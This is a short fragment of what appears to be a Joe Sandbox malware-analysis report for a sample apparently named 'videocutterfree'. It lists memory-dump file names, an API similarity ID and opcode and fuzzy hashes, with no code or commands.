                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                              • String ID:
                                                                              • API String ID: 682475483-0
                                                                              • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                              • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                              • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                              • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2